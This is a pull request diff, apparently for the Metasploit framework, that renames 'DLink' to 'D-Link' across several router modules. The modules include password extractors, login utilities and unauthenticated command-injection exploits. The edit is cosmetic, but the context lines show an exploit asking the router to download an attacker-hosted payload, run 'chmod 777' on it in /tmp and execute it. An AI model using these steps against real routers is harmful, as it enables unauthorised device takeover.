### PR TITLE
Spell DLink as D-Link every time

### DIFF
--- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'        => 'DLink DIR 645 Password Extractor',
+			'Name'        => 'D-Link DIR 645 Password Extractor',
 			'Description' => %q{
 					This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.
 				With this vulnerability you are able to extract the password for the remote

--- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'        => 'DLink DSL 320B Password Extractor',
+			'Name'        => 'D-Link DSL 320B Password Extractor',
 			'Description' => %q{
-					This module exploits an authentication bypass vulnerability in DLink DSL 320B
+					This module exploits an authentication bypass vulnerability in D-Link DSL 320B
 				<=v1.23. This vulnerability allows to extract the credentials for the remote
 				management interface.
 			},

--- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'           => 'DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility',
+			'Name'           => 'D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility',
 			'Description' => %q{
-					This module attempts to authenticate to different DLink HTTP management
+					This module attempts to authenticate to different D-Link HTTP management
 				services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615
 				Hardware revision D and D-Link DIR-320 devices. It is possible that this module
 				also works with other models.
@@ -71,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
 		@uri = "/login.php"
 
 		if is_dlink?
-			vprint_good("#{target_url} - DLink device detected")
+			vprint_good("#{target_url} - D-Link device detected")
 		else
-			vprint_error("#{target_url} - Dlink device doesn't detected")
+			vprint_error("#{target_url} - D-Link device doesn't detected")
 			return
 		end
 
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Auxiliary
 				:sname => (ssl ? 'https' : 'http'),
 				:user   => user,
 				:pass   => pass,
-				:proof  => "WEBAPP=\"DLink Management Interface\", PROOF=#{response.to_s}",
+				:proof  => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
 				:active => true
 			)
 

--- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'           => 'DLink DIR-615H HTTP Login Utility',
+			'Name'           => 'D-Link DIR-615H HTTP Login Utility',
 			'Description' => %q{
-					This module attempts to authenticate to different DLink HTTP management
+					This module attempts to authenticate to different D-Link HTTP management
 				services. It has been tested successfully on D-Link DIR-615 Hardware revision H
 				devices. It is possible that this module also works with other models.
 			},
@@ -56,9 +56,9 @@ class Metasploit3 < Msf::Auxiliary
 		@uri = "/login.htm"
 
 		if is_dlink?
-			vprint_good("#{target_url} - DLink device detected")
+			vprint_good("#{target_url} - D-Link device detected")
 		else
-			vprint_error("#{target_url} - Dlink device doesn't detected")
+			vprint_error("#{target_url} - D-Link device doesn't detected")
 			return
 		end
 
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
 				:sname => (ssl ? 'https' : 'http'),
 				:user   => user,
 				:pass   => pass,
-				:proof  => "WEBAPP=\"Dlink Management Interface\", PROOF=#{response.to_s}",
+				:proof  => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
 				:active => true
 			)
 

--- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'           => 'DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',
+			'Name'           => 'D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',
 			'Description'    => %q{
-					This module attempts to authenticate to different DLink HTTP management
+					This module attempts to authenticate to different D-Link HTTP management
 				services. It has been tested successfully on D-Link DIR-300 Hardware revision B,
 				D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645
 				Hardware revision A devices.It is possible that this module also works with	other
@@ -72,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary
 		@uri = "/session.cgi"
 
 		if is_dlink?
-			vprint_good("#{target_url} - DLink device detected")
+			vprint_good("#{target_url} - D-Link device detected")
 		else
-			vprint_error("#{target_url} - Dlink device doesn't detected")
+			vprint_error("#{target_url} - D-Link device doesn't detected")
 			return
 		end
 
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
 				:sname => (ssl ? 'https' : 'http'),
 				:user   => user,
 				:pass   => pass,
-				:proof  => "WEBAPP=\"Dlink Management Interface\", PROOF=#{response.to_s}",
+				:proof  => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
 				:active => true
 			)
 

--- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -17,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'        => 'DLink DIR-645 / DIR-815 diagnostic.php Command Execution',
+			'Name'        => 'D-Link DIR-645 / DIR-815 diagnostic.php Command Execution',
 			'Description' => %q{
-					Some DLink Routers are vulnerable to OS Command injection in the web interface.
+					Some D-Link Routers are vulnerable to OS Command injection in the web interface.
 				On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On
 				version 1.03 authentication is needed in order to trigger the vulnerability, which
-				has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B
+				has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B
 				and DIR-600, are also affected by this vulnerability. Not every device includes
 				wget which we need for deploying our payload. On such devices you could use the cmd
 				generic payload and try to start telnetd or execute other commands. Since it is a
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# download payload
 		#
-		print_status("#{rhost}:#{rport} - Asking the DLink device to download #{service_url}")
+		print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
 		#this filename is used to store the payload on the device
 		filename = rand_text_alpha_lower(8)
 
@@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# wait for payload download
 		if (datastore['DOWNHOST'])
-			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
+			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
 			select(nil, nil, nil, datastore['HTTP_DELAY'])
 		else
 			wait_linux_payload
@@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# chmod
 		#
 		cmd = "chmod 777 /tmp/#{filename}"
-		print_status("#{rhost}:#{rport} - Asking the DLink device to chmod #{downfile}")
+		print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
 		res = request(cmd,uri)
 		if (!res)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# execute
 		#
 		cmd = "/tmp/#{filename}"
-		print_status("#{rhost}:#{rport} - Asking the DLink device to execute #{downfile}")
+		print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
 		res = request(cmd,uri)
 		if (!res)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# download payload
 		#
-		print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
+		print_status("#{rhost}:#{rport} - Asking the D-Link device to take and execute #{service_url}")
 		#this filename is used to store the payload on the device
 		filename = rand_text_alpha_lower(8)
 
@@ -225,7 +225,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# wait for payload download
 		if (datastore['DOWNHOST'])
-			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
+			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
 			select(nil, nil, nil, datastore['HTTP_DELAY'])
 		else
 			wait_linux_payload


### PR DESCRIPTION
This makes the spelling of "D-Link" consistent. Of course, in code, even the D-Link people sometimes call it "DLINK" (for ssids, eg), but for text purposes, it should always be spelled "D-Link." This will ensure that searches will pick up the right modules every time.
